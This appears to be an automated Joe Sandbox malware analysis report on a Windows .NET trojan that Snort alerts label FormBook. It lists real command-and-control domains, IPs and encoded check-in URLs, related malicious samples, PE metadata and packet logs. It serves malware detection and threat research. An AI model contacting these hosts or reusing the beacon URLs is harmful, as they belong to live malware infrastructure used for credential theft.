          1D4l9eR0W4.exe24%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.wlanext.exe.cade18.1.unpack100%AviraHEUR/AGEN.1110362Download File
          3.0.1D4l9eR0W4.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.1D4l9eR0W4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.1D4l9eR0W4.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.1D4l9eR0W4.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.wlanext.exe.3b2796c.4.unpack100%AviraHEUR/AGEN.1110362Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.scion-go-getter.com/mwev/0%Avira URL Cloudsafe
          https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.foxandmew.com
          107.164.242.49
          truetrue
            unknown
            royallecleaning.com
            34.102.136.180
            truefalse
              unknown
              texascountrycharts.com
              15.197.142.173
              truetrue
                unknown
                www.21yingyang.com
                147.255.129.44
                truetrue
                  unknown
                  www.rip-online.com
                  43.132.183.85
                  truetrue
                    unknown
                    9linefarms.com
                    34.102.136.180
                    truefalse
                      unknown
                      websitessample.com
                      198.143.147.58
                      truetrue
                        unknown
                        shops.myshopify.com
                        23.227.38.74
                        truetrue
                          unknown
                          www.tikomobile.store
                          87.236.16.208
                          truetrue
                            unknown
                            ghs.googlehosted.com
                            142.250.203.115
                            truefalse
                              unknown
                              www.scion-go-getter.com
                              35.209.150.94
                              truetrue
                                unknown
                                www.fulvousemollientplanet.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.sandman.network
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.fourthandwhiteoak.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.royallecleaning.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.websitessample.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.experimentwithoutlimits.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.9linefarms.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.texascountrycharts.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                www.scion-go-getter.com/mwev/true
                                                • Avira URL Cloud: safe
                                                low

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxvwlanext.exe, 00000007.00000002.920741611.0000000003CA2000.00000004.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                147.255.129.44
                                                www.21yingyang.comUnited States
                                                395954LEASEWEB-USA-LAX-11UStrue
                                                198.143.147.58
                                                websitessample.comUnited States
                                                32475SINGLEHOP-LLCUStrue
                                                142.250.203.115
                                                ghs.googlehosted.comUnited States
                                                15169GOOGLEUSfalse
                                                43.132.183.85
                                                www.rip-online.comJapan4249LILLY-ASUStrue
                                                15.197.142.173
                                                texascountrycharts.comUnited States
                                                7430TANDEMUStrue
                                                34.102.136.180
                                                royallecleaning.comUnited States
                                                15169GOOGLEUSfalse
                                                87.236.16.208
                                                www.tikomobile.storeRussian Federation
                                                198610BEGET-ASRUtrue
                                                23.227.38.74
                                                shops.myshopify.comCanada
                                                13335CLOUDFLARENETUStrue
                                                35.209.150.94
                                                www.scion-go-getter.comUnited States
                                                19527GOOGLE-2UStrue
                                                107.164.242.49
                                                www.foxandmew.comUnited States
                                                18779EGIHOSTINGUStrue

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:532910
                                                Start date:02.12.2021
                                                Start time:19:58:18
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:1D4l9eR0W4 (renamed file extension from none to exe)
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:19
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/1@13/10
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 9% (good quality ratio 8%)
                                                • Quality average: 73.5%
                                                • Quality standard deviation: 31.8%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                19:59:12API Interceptor1x Sleep call for process: 1D4l9eR0W4.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                147.255.129.44SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                • www.21yingyang.com/mwev/?u0DdGBi=iTGszEHlBYgcRwpId8qTe/0GehEi8eYY5QbC9Xr3Bat1wyeYeVdDfMMehGeT7pNsgv6CGA==&HpVD=iXlpidI0s6mDitEp
                                                198.143.147.58reg.exeGet hashmaliciousBrowse
                                                • www.websitessample.com/mwev/?rZVL=6lrP2VgHHTnd&r6=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRqPb8zpCe6E2r5wI1g==
                                                43.132.183.85ufKi6DmWMQCuEb4.exeGet hashmaliciousBrowse
                                                • www.healthhe.com/9wgi/?mTnDMfL=nQGjtlZ7eRUHwP4Z4tO8cV7Bzgn9otHTDQD7oplJJHpTPPdwy0qEHwINuBUe4zIxwCsGJlojCg==&r0GT=mDK8ZPtxNpdLjB
                                                jwcvWLwp0CZr8vg.exeGet hashmaliciousBrowse
                                                • www.healthhe.com/9wgi/?3fxxp=EBZTNj0PnHVpFH&dzu=nQGjtlZ7eRUHwP4Z4tO8cV7Bzgn9otHTDQD7oplJJHpTPPdwy0qEHwINuC4OkCUK33FX
                                                Ro45xx19mJ.exeGet hashmaliciousBrowse
                                                • www.rip-online.com/mwev/?JBC=v0GDzH582Ju&0TTl=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/DbytGeiQy
                                                Quote request.exeGet hashmaliciousBrowse
                                                • www.danspector.com/s2qi/?TJELpfLP=wk5o9Nw0j1iN37aRpEOlI+T8U4PCxjQomsRo9YSbE/cxw239lSyuv2lXox8CT+4oiR0o&3f=5jlpdHK
                                                Order Information.exeGet hashmaliciousBrowse
                                                • www.tnea2014.com/ku75/?Nzr=wkPyjuKu05wfVewMtaIstfs5BkK/aSiXXagUckB5lM3cdyxhPyMoX6I/2wUATQlZH5SF&CpFPs=4hhtux5884
                                                NCh22JHZDm.exeGet hashmaliciousBrowse
                                                • www.rip-online.com/mwev/?G2JH=XHKxqvvx_ZS4e&vL3=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/DbytGeiQy
                                                oE0LTpFfM5.exeGet hashmaliciousBrowse
                                                • www.mid-a.com/sywu/?TBut=WgpeYtAseThH4QtfgVv0cb7Bg0jNPj9o5cTJSX1UgoRmdi55VpY+UI31BhB8YZPKC1Kd&vZht5=VvQH
                                                2FNlQLySZS.exeGet hashmaliciousBrowse
                                                • www.tinkerform.com/sb6n/?0D=pRSBl5iInDQS/mEmghDJpafSsKdl6W/ss2J4xFBNSpqvPWTEIxu+aBxjWe+O9C7y0cHr&nTVpz=Sd0TT4
                                                soa_02010021.exeGet hashmaliciousBrowse
                                                • www.ejezeta3d.com/nqn4/?-ZddGje=pJ0bBDGBV2J76o+yGQK16eA9Gz37NHdqUA04Td04W41QkvryWymFX7LPCOYt2g0zDZcJ&3ffLp=fp_T0dZXgD
                                                Nueva orden de investigaci#U00f3n de Desppo.exeGet hashmaliciousBrowse
                                                • www.glottogon.com/b5ce/?jHedL=ckMRj/bQcJ3zkEaLUVXE630jgoKCI0iVURz6YRY0HozN/iyT/73YqkbmlSCbTPo2a7Pz&GvFLR=KN64Dj
                                                DOCS-0094-LPO.exeGet hashmaliciousBrowse
                                                • www.glottogon.com/b5ce/?YHF=ckMRj/bQcJ3zkEaLUVXE630jgoKCI0iVURz6YRY0HozN/iyT/73YqkbmlRihDeIOAcu0&YP=u41l2ZNhXfZlaX50

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.21yingyang.comSHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                • 147.255.129.44
                                                www.scion-go-getter.comreg.exeGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                k5RK7H1oSH.exeGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                Ro45xx19mJ.exeGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                NCh22JHZDm.exeGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                dG6oqbfIce.exeGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                • 35.209.150.94
                                                www.rip-online.comRo45xx19mJ.exeGet hashmaliciousBrowse
                                                • 43.132.183.85
                                                NCh22JHZDm.exeGet hashmaliciousBrowse
                                                • 43.132.183.85
                                                Order Confirmation.exeGet hashmaliciousBrowse
                                                • 43.132.183.85
                                                shops.myshopify.comMilleniumbpc.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Narudzba.0953635637.PDF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Packing List.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Poh Tiong Trading - products list.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL SHIPMENT NOTIFICATION 284748395,PDF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Original Doc Ref 2853801324189923.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Doc_PrInd011221.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PAYMENT_.EXEGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ixhqecYUbg.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                00110030.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Order Inquiry1.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Sat#U0131n alma emri.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Consignment Notification.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ZByFnffjIp.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Dhl_AWB5032675620,pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Order29112021.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Documnet 29.11.2021.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                STATEMENT .docGet hashmaliciousBrowse
                                                • 23.227.38.74

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                SINGLEHOP-LLCUSreg.exeGet hashmaliciousBrowse
                                                • 198.143.147.58
                                                OVER R RICHIESTA D'OFFERTA ITEM R206,pdf.exeGet hashmaliciousBrowse
                                                • 173.236.126.10
                                                ZByFnffjIp.exeGet hashmaliciousBrowse
                                                • 198.143.141.58
                                                BVSwXNK8j6.exeGet hashmaliciousBrowse
                                                • 198.20.110.107
                                                Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                • 107.6.148.162
                                                B67M2Q6NeKGet hashmaliciousBrowse
                                                • 65.62.12.157
                                                jydygx.x86Get hashmaliciousBrowse
                                                • 69.175.81.126
                                                TikNgaeW5GGet hashmaliciousBrowse
                                                • 65.60.29.39
                                                wPLf38GLbnGet hashmaliciousBrowse
                                                • 108.163.249.5
                                                4IjC16LtGDGet hashmaliciousBrowse
                                                • 184.154.111.112
                                                6bitgZ9pqQGet hashmaliciousBrowse
                                                • 63.251.15.144
                                                z0x3n.arm7Get hashmaliciousBrowse
                                                • 184.154.183.255
                                                3bTl0OgWsEGet hashmaliciousBrowse
                                                • 65.63.38.128
                                                9B6EN8PxhHGet hashmaliciousBrowse
                                                • 65.62.1.143
                                                bc3ttunRjZGet hashmaliciousBrowse
                                                • 65.62.1.159
                                                gEozNq7ILxGet hashmaliciousBrowse
                                                • 199.26.251.75
                                                l0vNaPgd6fGet hashmaliciousBrowse
                                                • 65.63.160.62
                                                KKveTTgaAAsecNNaaaa.armGet hashmaliciousBrowse
                                                • 65.60.17.10
                                                mipsGet hashmaliciousBrowse
                                                • 65.63.92.227
                                                BS0Dxmu2goGet hashmaliciousBrowse
                                                • 65.63.212.249
                                                LEASEWEB-USA-LAX-11USRFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                                • 108.187.86.48
                                                YjKK5XYBzBGet hashmaliciousBrowse
                                                • 172.255.161.176
                                                JUyE95BLaLGet hashmaliciousBrowse
                                                • 172.255.161.168
                                                9hyE41yNDBGet hashmaliciousBrowse
                                                • 23.86.78.90
                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                • 23.110.31.106
                                                vbc.exeGet hashmaliciousBrowse
                                                • 23.110.31.106
                                                xd.x86Get hashmaliciousBrowse
                                                • 23.80.138.175
                                                eKmL8hvXz2Get hashmaliciousBrowse
                                                • 108.187.220.76
                                                TsOl2c6Yc6Get hashmaliciousBrowse
                                                • 23.83.26.237
                                                SALES CONFIRMATION 153_154 SN.xlsxGet hashmaliciousBrowse
                                                • 23.110.31.106
                                                oQANZnrt9dGet hashmaliciousBrowse
                                                • 23.83.26.245
                                                xzKS6P1qDo.exeGet hashmaliciousBrowse
                                                • 23.104.53.233
                                                apep.mipsGet hashmaliciousBrowse
                                                • 108.187.80.246
                                                7H5yVEypQXGet hashmaliciousBrowse
                                                • 23.85.79.155
                                                7OjVU04f8q.exeGet hashmaliciousBrowse
                                                • 23.110.31.75
                                                DuxgwH47QB.exeGet hashmaliciousBrowse
                                                • 23.110.128.234
                                                ORDER.docGet hashmaliciousBrowse
                                                • 23.110.128.234
                                                SWIFT-MLSB-11,546__doc.exeGet hashmaliciousBrowse
                                                • 23.110.95.195
                                                BwJriVGrt5.exeGet hashmaliciousBrowse
                                                • 23.110.31.77
                                                29383773738387477474774.exeGet hashmaliciousBrowse
                                                • 142.234.161.17

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1D4l9eR0W4.exe.log
                                                Process:C:\Users\user\Desktop\1D4l9eR0W4.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1310
                                                Entropy (8bit):5.345651901398759
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                Malicious:true
                                                Reputation:moderate, very likely benign file
                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.732950623221911
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:1D4l9eR0W4.exe
                                                File size:415744
                                                MD5:192b796d92d190c45204571599c38c86
                                                SHA1:611559df5b74934dea4c81a5490e2c64a73ee6e0
                                                SHA256:23c8bfea897f9833766ceab96299a77ad19ed1e0897b7e30d56d2c56c30d2d4e
                                                SHA512:da9e4bb2300d2968125427d122d5e81cecf2d342dc2c17fc16d5dc1ac7f511d53e75233c1844c1948f6a82740818166229e7ea2411a40351c54e8e97a3b4ec42
                                                SSDEEP:6144:4z2kQqvZRHkXGQTY22C7/GXrBPKCQAm9Xuijhw7+57SUTnzvzHKQhZgoWL:FXGop2CDGXr5K6m9XuijK+Rzv7KvX
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4"..................N..........>l... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x466c3e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0xEB22348E [Mon Jan 3 10:03:58 2095 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x66bf00x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x4c0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x64c440x64e00False0.870425766729data7.74726232744IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0x680000x4c00x600False0.371744791667data3.68166611193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x6a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0x680a00x234data
                                                RT_MANIFEST0x682d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyright
                                                Assembly Version0.0.0.0
                                                InternalNameLi.exe
                                                FileVersion0.0.0.0
                                                ProductVersion0.0.0.0
                                                FileDescription
                                                OriginalFilenameLi.exe

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                12/02/21-20:00:13.946948TCP1201ATTACK-RESPONSES 403 Forbidden804979534.102.136.180192.168.2.4
                                                12/02/21-20:00:30.227937TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.4147.255.129.44
                                                12/02/21-20:00:30.227937TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.4147.255.129.44
                                                12/02/21-20:00:30.227937TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.4147.255.129.44
                                                12/02/21-20:00:35.804477TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983480192.168.2.415.197.142.173
                                                12/02/21-20:00:35.804477TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983480192.168.2.415.197.142.173
                                                12/02/21-20:00:35.804477TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983480192.168.2.415.197.142.173
                                                12/02/21-20:00:36.003989TCP1201ATTACK-RESPONSES 403 Forbidden804983415.197.142.173192.168.2.4
                                                12/02/21-20:00:46.504425TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985780192.168.2.423.227.38.74
                                                12/02/21-20:00:46.504425TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985780192.168.2.423.227.38.74
                                                12/02/21-20:00:46.504425TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985780192.168.2.423.227.38.74
                                                12/02/21-20:00:46.553481TCP1201ATTACK-RESPONSES 403 Forbidden804985723.227.38.74192.168.2.4
                                                12/02/21-20:01:08.006106TCP1201ATTACK-RESPONSES 403 Forbidden804990834.102.136.180192.168.2.4
                                                12/02/21-20:01:13.388249TCP2031453ET TROJAN FormBook CnC Checkin (GET)4990980192.168.2.443.132.183.85
                                                12/02/21-20:01:13.388249TCP2031449ET TROJAN FormBook CnC Checkin (GET)4990980192.168.2.443.132.183.85
                                                12/02/21-20:01:13.388249TCP2031412ET TROJAN FormBook CnC Checkin (GET)4990980192.168.2.443.132.183.85

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 2, 2021 20:00:13.748461008 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:13.767793894 CET804979534.102.136.180192.168.2.4
                                                Dec 2, 2021 20:00:13.767949104 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:13.768181086 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:13.787358999 CET804979534.102.136.180192.168.2.4
                                                Dec 2, 2021 20:00:13.946948051 CET804979534.102.136.180192.168.2.4
                                                Dec 2, 2021 20:00:13.946983099 CET804979534.102.136.180192.168.2.4
                                                Dec 2, 2021 20:00:13.947145939 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:13.947192907 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:14.245307922 CET4979580192.168.2.434.102.136.180
                                                Dec 2, 2021 20:00:14.264705896 CET804979534.102.136.180192.168.2.4
                                                Dec 2, 2021 20:00:18.979742050 CET4980980192.168.2.435.209.150.94
                                                Dec 2, 2021 20:00:19.109371901 CET804980935.209.150.94192.168.2.4
                                                Dec 2, 2021 20:00:19.109591007 CET4980980192.168.2.435.209.150.94
                                                Dec 2, 2021 20:00:19.110166073 CET4980980192.168.2.435.209.150.94
                                                Dec 2, 2021 20:00:19.239556074 CET804980935.209.150.94192.168.2.4
                                                Dec 2, 2021 20:00:19.620712042 CET4980980192.168.2.435.209.150.94
                                                Dec 2, 2021 20:00:19.791668892 CET804980935.209.150.94192.168.2.4
                                                Dec 2, 2021 20:00:23.170021057 CET804980935.209.150.94192.168.2.4
